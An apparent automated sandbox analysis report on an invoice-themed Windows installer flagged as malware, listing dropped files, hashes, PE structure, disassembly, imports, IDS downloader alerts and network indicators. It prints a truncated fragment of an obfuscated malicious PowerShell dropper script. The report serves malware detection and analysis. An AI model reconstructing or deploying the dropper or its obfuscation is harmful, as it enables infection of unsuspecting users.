                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                      Category:dropped
                                                                                      Size (bytes):880319
                                                                                      Entropy (8bit):7.714263627278454
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:l9LVa31WR5y/seQ/33WcLvfLn/ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0maD:/D5y/+/vfD/+alCJmvulW6Nd0vD
                                                                                      MD5:DE02502F79BC183714A9DFE879831170
                                                                                      SHA1:C1FD975E0DF663FD49E86AE1453D0AD3ECCACEA8
                                                                                      SHA-256:9E3EF4DBB2D13139C75E1CBF855114111E6378FC518B7666F972442134D06718
                                                                                      SHA-512:C921E2E02ED0969AD66AE503E3CC83D0E2A3C3D6D43814C8B31C3B8606CDE77E6F39C9A4B41088C0718B182A84DC29CAE5F609DFF872E98DCD00EF28C58B6415
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.......1.......p....@.......................................@.................................4u....... ..X............................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...0...............................rsrc...X.... .......~..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                      Process:C:\Users\user\Desktop\FACTURA DE PAGO.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):411197
                                                                                      Entropy (8bit):3.2412073600303604
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC
                                                                                      MD5:9548F6F7A71852794789DE0AC5FDE451
                                                                                      SHA1:74C915E2C9C110929FD87C907BE17930B0B66B24
                                                                                      SHA-256:2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471
                                                                                      SHA-512:0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE
                                                                                      Malicious:false
                                                                                      Preview:....u*...........................*................................#.k4..`.......K....................7F#.....-....................Z.........v.................#.............p...<.....5.j...........p....j....... 4.....h................q.2.......C..................................,.............\........#..................e..........b.........................o..8.e........'.Q......<..........e.x...8......=.......}.....QU......E.....O............................6....^.y.....~........i..........................Q..`.>...........m..........,................6/..._..f....\.........`.y.............................6...............2[........................)..........................<....7......6..................8.....................................b...........................3.....U.......N.........k8.x.........................)~..............o.....+.............6............Y.>....................e.J....S...t..........K........................P\.............r...................... ............
                                                                                      Process:C:\Users\user\Desktop\FACTURA DE PAGO.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):15845
                                                                                      Entropy (8bit):7.693658939604953
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p
                                                                                      MD5:762778DFE1B62D3430B44A32AEDC03E0
                                                                                      SHA1:7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5
                                                                                      SHA-256:9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8
                                                                                      SHA-512:B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF
                                                                                      Malicious:false
                                                                                      Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..IE..'...Ph.....(....(...)(...(....(...J`.QI@.(....(.....(....(....)(...).f..(.......Q@.%.P.IE..RQE...Q@..).RQE...Q@.%.P.IE...%.P.IE..RQE.mQE..bQE..QE%..QE......QE%..QE.......QI@..Q@.%.P.IE..RQE..QI@..RP.E.....RS.i(...%.P.IE%.-%.P.IE..RQE...Q@..).RQE...Q@.%.P0....J(...-%.P.IE...IE..aE...QE..QE%..QE.%.Q@...S...J..QI@.IE..RQE...Q@..RP.E...QE%0.(...%...-%...QE..RQE...Q@.%.P0
                                                                                      Process:C:\Users\user\Desktop\FACTURA DE PAGO.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):91155
                                                                                      Entropy (8bit):3.2484639775571122
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4
                                                                                      MD5:55DD84338306B8F361571D07E3D03F25
                                                                                      SHA1:5F086147B0ED6D4CBE40B6F81C1003EB07714B94
                                                                                      SHA-256:016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45
                                                                                      SHA-512:045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8
                                                                                      Malicious:false
                                                                                      Preview:....7.................3.........}.......Q.....................~........y.........u...4...bp..o......z.......................................................k.............Tg.....`..Q.........<........A........f.....X..."..............^.........@....|..........................h....X..................1.......zh...........3..>..)...Y....:.................GG.....+F#...z.~.....!....................:..............(.................Y....7.......5..^..{.......D...`................O..............z#..............4$...a..............o....................c..s.......=......^..~..................................B....o.......................................l:...........*Y..i.".C..i............_.........).....-...............|P.......b......h....~.....w+....................-....1.......<...6.........b.".@...................1...P....s..h9.......l........H..................k...e........<.......f...;...............m....W...........h.g.%...........-........."..................S......F.....e........
                                                                                      Process:C:\Users\user\Desktop\FACTURA DE PAGO.exe
                                                                                      File Type:ASCII text, with very long lines (360), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):362
                                                                                      Entropy (8bit):4.295609901239941
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js
                                                                                      MD5:A47DE65B255D62E154E75208730B37D2
                                                                                      SHA1:9AD95C489EABDBCD12C02CD312C85D0C73A565F7
                                                                                      SHA-256:1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784
                                                                                      SHA-512:206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A
                                                                                      Malicious:false
                                                                                      Preview:beboere sletteprogrammerne afbrndtes untruthfulness,methanolysis blokniveauets tegnbaseret keisar arbejdsmndene rger,lsenets quindecimvir complexify hundevagten cymblernes.cressier immediate batchkrslerne antisepalous cryptonymic pings,pampination spytkirtlen vandranunkel stormmaage,diversificer udtalendes attributgrammatiks snedkeris sati frailejon rvturene..
                                                                                      Process:C:\Users\user\Desktop\FACTURA DE PAGO.exe
                                                                                      File Type:GTA audio index data (SDT)
                                                                                      Category:dropped
                                                                                      Size (bytes):339224
                                                                                      Entropy (8bit):3.2329059465811363
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN
                                                                                      MD5:2AFAF6367CF5833A8885999FEFA5B44A
                                                                                      SHA1:58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9
                                                                                      SHA-256:66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074
                                                                                      SHA-512:A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4
                                                                                      Malicious:false
                                                                                      Preview:........5M.....]...................[8...........t...........j.kKk.............Y.3.-.........u.....'.......<..............0..............-.....m....q.%.........S....F......6.............M.C.z.........m.|..............m...].-..<.......0.............o......QL....x....... ..........p.........?.'.a........:.........K............................#............Z).......$......................................9......................_u...1...S>............................c....K\......l.......z............%..(..........8...........z.........\....$......._.g...........v.....{R..............;.............R........1........:...Q...........W..W....................................F .....-...b..F........G...,CH......}...D....b...........9...8...q......Y....R..............................................<..............=...~................. ...........u.......T...B..............i............`....r...........R..............1.2........................../....#.......b.............;...............-..+
                                                                                      Process:C:\Users\user\Desktop\FACTURA DE PAGO.exe
                                                                                      File Type:ASCII text, with very long lines (3179), with CRLF, LF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):53691
                                                                                      Entropy (8bit):5.3301215624771165
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:y8ydwJkymbROj2OT/UOomJZlXFpMI7k9D1Og/7wVKlMhVaPCQc2jVT:y8ycmd0DUOoGXFZKcg8OmVuD5
                                                                                      MD5:F9BB610FDAF3E9FB1B4FAA9FFDDFAB51
                                                                                      SHA1:B0858761694B149C52D79D915D24D6D8FE161D14
                                                                                      SHA-256:9AAA17344E82A1134FF2B6C6E1EEE773F703FD9F110B9B58FDFB87824F5DEF78
                                                                                      SHA-512:34F0F7CE7E4CBEB1CE0B699CFC97E5F6619DCD238FBA0D9B30645D4FBC4AD5D97149355703568484B5110C621ACD8EB1A0FB748359D4473CD7BF4B85235DEF54
                                                                                      Malicious:true
                                                                                      Preview:$Geosid=$Dataskrms98;..<#Anfrslen Legalised Demurringly #>..<#dialuric Divinization Oprrsgrupperne Trakkasseriernes aqualunger socialforskningsinstituttet Tnkning #>..<#Lsesalen Irreprovableness Afplukninger Reaccentuating peelite Chelifer Aphrasia #>..<#Journalmedarbejderes Assimileringer Sgeretningen starutters #>..<#Fremontia Summat Inaudibility #>..<#tidsfunktions Chlorastrolite Cannibal #>...$Kladdebger = @'. re i.Depre$StyrtPvitelrPaalieEjecttP espeRu.tenAandecKos fefotog1Rabfa4 Flge3Crush=H rsk$Tal,iFJoahcoCham rAfkorm dskaoTopa d ynaeZacha; Proj..iberfPa hyuDory.n Ram c.illptByraai Co so Fne.nSolve No.infHo.gia u fecVoldfkTerebi PotenBab lg peplsCon e Hardi(Vangs$PsalmCObserhLithoa depelReappaMicrozSilk a Bic ,Guill$Udmr,K,nvilaA pelrLogiko WhintGrrfuiJauncnReckueGenudnfaheysFagal)Gillb Zineb{mu ns.Va dr.S.lve$AnisoB,tilfaSal,slDeglunTea.reBevgeu Kr mm Pret Winkl(Sa,piLAntiqiAnag vTriansConvusMalayy LandnsepareSjlefnKa areOppersSuppe Akek 'Ver.sUNoegnnUndolcYpsilaFinkesS.tte$O
                                                                                      Process:C:\Users\user\Desktop\FACTURA DE PAGO.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):322292
                                                                                      Entropy (8bit):7.709587921432435
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:SSnZAidizRFgkFpjtBUJ44dfK8mcfMEf4W8Y/Vdym1B3C50c7rJGpjlNGeSy:SSnmowRFgWtBUJ4oSFc/gfWL/3ofJsj1
                                                                                      MD5:7A5B44360C380432ECECA4C843D48CDA
                                                                                      SHA1:3CA537ABBE8F574C6A619F738DC8AB3BCB7E26B5
                                                                                      SHA-256:72B4863E0A3B4BFAE49943812C29CF0B52415569AC5A3A0CC41E7A15060CDAF0
                                                                                      SHA-512:B882A08E1FA834E29A2A7DFB719C9A0D60ACD7D97CF5958F1541313FF15BB66B8AE7ADCFEABCF4BC35935D6B58E035C17ACFE0A199A7AD69DAD2C48E37DD74C8
                                                                                      Malicious:false
                                                                                      Preview:...............??.....Z............LLL.G..:.....kkk..WWW.....................A.......{{.@@................yyy....Z.gg.www..........N..................)))))))......T.rrrr....................@@.....--..............00......5....WW.....[....."..........9999............y..........................~.,....N......................._.....H........XXXXX....I.....jjj.......44444......mmmmm.......4........s................TTTT.........zz.......6........s.....p......<...................................RRR..gg....................n...>........$$....................g....yyyy..f..jj......................CC.BB........F.......[.....................................XXXXXX..............555......................................h..O.....((..fffffff.................Y.......................%%....................................................99............................666............>.].....LL..hh..(..,............---.......N.........................f...|.................(........y..""".f..........R....2.....
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                      Entropy (8bit):7.714263627278454
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:FACTURA DE PAGO.exe
                                                                                      File size:880'319 bytes
                                                                                      MD5:de02502f79bc183714a9dfe879831170
                                                                                      SHA1:c1fd975e0df663fd49e86ae1453d0ad3eccacea8
                                                                                      SHA256:9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718
                                                                                      SHA512:c921e2e02ed0969ad66ae503e3cc83d0e2a3c3d6d43814c8b31c3b8606cde77e6f39c9a4b41088c0718b182a84dc29cae5f609dff872e98dcd00ef28c58b6415
                                                                                      SSDEEP:12288:l9LVa31WR5y/seQ/33WcLvfLn/ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0maD:/D5y/+/vfD/+alCJmvulW6Nd0vD
                                                                                      TLSH:B3151246F7A9DAA7E831813014BE9535F234AC360561860B3366BF7A493337F091B6DE
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.....
                                                                                      Icon Hash:4ccc524656d64e01
                                                                                      Entrypoint:0x40310f
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                                      Instruction
                                                                                      sub esp, 00000184h
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      xor ebx, ebx
                                                                                      push 00008001h
                                                                                      mov dword ptr [esp+18h], ebx
                                                                                      mov dword ptr [esp+10h], 00409198h
                                                                                      mov dword ptr [esp+20h], ebx
                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                      call dword ptr [004070A8h]
                                                                                      call dword ptr [004070A4h]
                                                                                      cmp ax, 00000006h
                                                                                      je 00007FA76CDD1833h
                                                                                      push ebx
                                                                                      call 00007FA76CDD47A1h
                                                                                      cmp eax, ebx
                                                                                      je 00007FA76CDD1829h
                                                                                      push 00000C00h
                                                                                      call eax
                                                                                      mov esi, 00407298h
                                                                                      push esi
                                                                                      call 00007FA76CDD471Dh
                                                                                      push esi
                                                                                      call dword ptr [004070A0h]
                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                      cmp byte ptr [esi], bl
                                                                                      jne 00007FA76CDD180Dh
                                                                                      push ebp
                                                                                      push 00000009h
                                                                                      call 00007FA76CDD4774h
                                                                                      push 00000007h
                                                                                      call 00007FA76CDD476Dh
                                                                                      mov dword ptr [0042E404h], eax
                                                                                      call dword ptr [00407044h]
                                                                                      push ebx
                                                                                      call dword ptr [00407288h]
                                                                                      mov dword ptr [0042E4B8h], eax
                                                                                      push ebx
                                                                                      lea eax, dword ptr [esp+38h]
                                                                                      push 00000160h
                                                                                      push eax
                                                                                      push ebx
                                                                                      push 00428828h
                                                                                      call dword ptr [00407174h]
                                                                                      push 00409188h
                                                                                      push 0042DC00h
                                                                                      call 00007FA76CDD4397h
                                                                                      call dword ptr [0040709Ch]
                                                                                      mov ebp, 00434000h
                                                                                      push eax
                                                                                      push ebp
                                                                                      call 00007FA76CDD4385h
                                                                                      push ebx
                                                                                      call dword ptr [00407154h]
                                                                                      Programming Language:
                                                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x75340xa0.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x420000x1aa58.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x5fdd0x600038462d04cfdbc4943d18be461d53cc3eFalse0.6783854166666666data6.499697507009752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x70000x13520x14003d134ae5961af9895950a7ee0adc520aFalse0.4583984375data5.207538993430304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x90000x254f80x6002d00401e0c64d69b6d0ccb877d9f624eFalse0.4544270833333333data4.0323505938358934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .ndata0x2f0000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x420000x1aa580x1ac00098718c0c5bf54afe6e125c2f1ac35baFalse0.23448452102803738data3.706045365348602IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_BITMAP0x424600x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                      RT_ICON0x427c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.09021944871643203
                                                                                      RT_ICON0x52ff00x32f2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9443336911516639
                                                                                      RT_ICON0x562e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.16089211618257263
                                                                                      RT_ICON0x588900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.18738273921200752
                                                                                      RT_ICON0x599380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.31050106609808104
                                                                                      RT_ICON0x5a7e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.440884476534296
                                                                                      RT_ICON0x5b0880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.5635838150289018
                                                                                      RT_ICON0x5b5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.2703900709219858
                                                                                      RT_ICON0x5ba580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.21908602150537634
                                                                                      RT_ICON0x5bd400x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.3716216216216216
                                                                                      RT_DIALOG0x5be680x144dataEnglishUnited States0.5216049382716049
                                                                                      RT_DIALOG0x5bfb00x13cdataEnglishUnited States0.5506329113924051
                                                                                      RT_DIALOG0x5c0f00x100dataEnglishUnited States0.5234375
                                                                                      RT_DIALOG0x5c1f00x11cdataEnglishUnited States0.6056338028169014
                                                                                      RT_DIALOG0x5c3100xc4dataEnglishUnited States0.5918367346938775
                                                                                      RT_DIALOG0x5c3d80x60dataEnglishUnited States0.7291666666666666
                                                                                      RT_GROUP_ICON0x5c4380x92dataEnglishUnited States0.6575342465753424
                                                                                      RT_VERSION0x5c4d00x248dataEnglishUnited States0.5308219178082192
                                                                                      RT_MANIFEST0x5c7180x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                                                      DLLImport
                                                                                      KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                      USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                      ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-10-21T11:16:46.535494+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736216.58.206.46443TCP
                                                                                      2024-10-21T11:16:52.929125+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738193.122.6.16880TCP
                                                                                      2024-10-21T11:16:54.210380+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738193.122.6.16880TCP
                                                                                      2024-10-21T11:16:54.926325+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449740188.114.97.3443TCP
                                                                                      2024-10-21T11:16:55.835397+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741193.122.6.16880TCP
                                                                                      2024-10-21T11:16:56.563306+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449742188.114.97.3443TCP
                                                                                      2024-10-21T11:16:58.201916+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449744188.114.97.3443TCP
                                                                                      2024-10-21T11:16:59.851756+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746188.114.97.3443TCP
                                                                                      2024-10-21T11:17:01.461686+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449748188.114.97.3443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 21, 2024 11:16:45.205578089 CEST49736443192.168.2.4216.58.206.46
                                                                                      Oct 21, 2024 11:16:45.205616951 CEST44349736216.58.206.46192.168.2.4
                                                                                      Oct 21, 2024 11:16:45.205836058 CEST49736443192.168.2.4216.58.206.46
                                                                                      Oct 21, 2024 11:16:45.228250027 CEST49736443192.168.2.4216.58.206.46
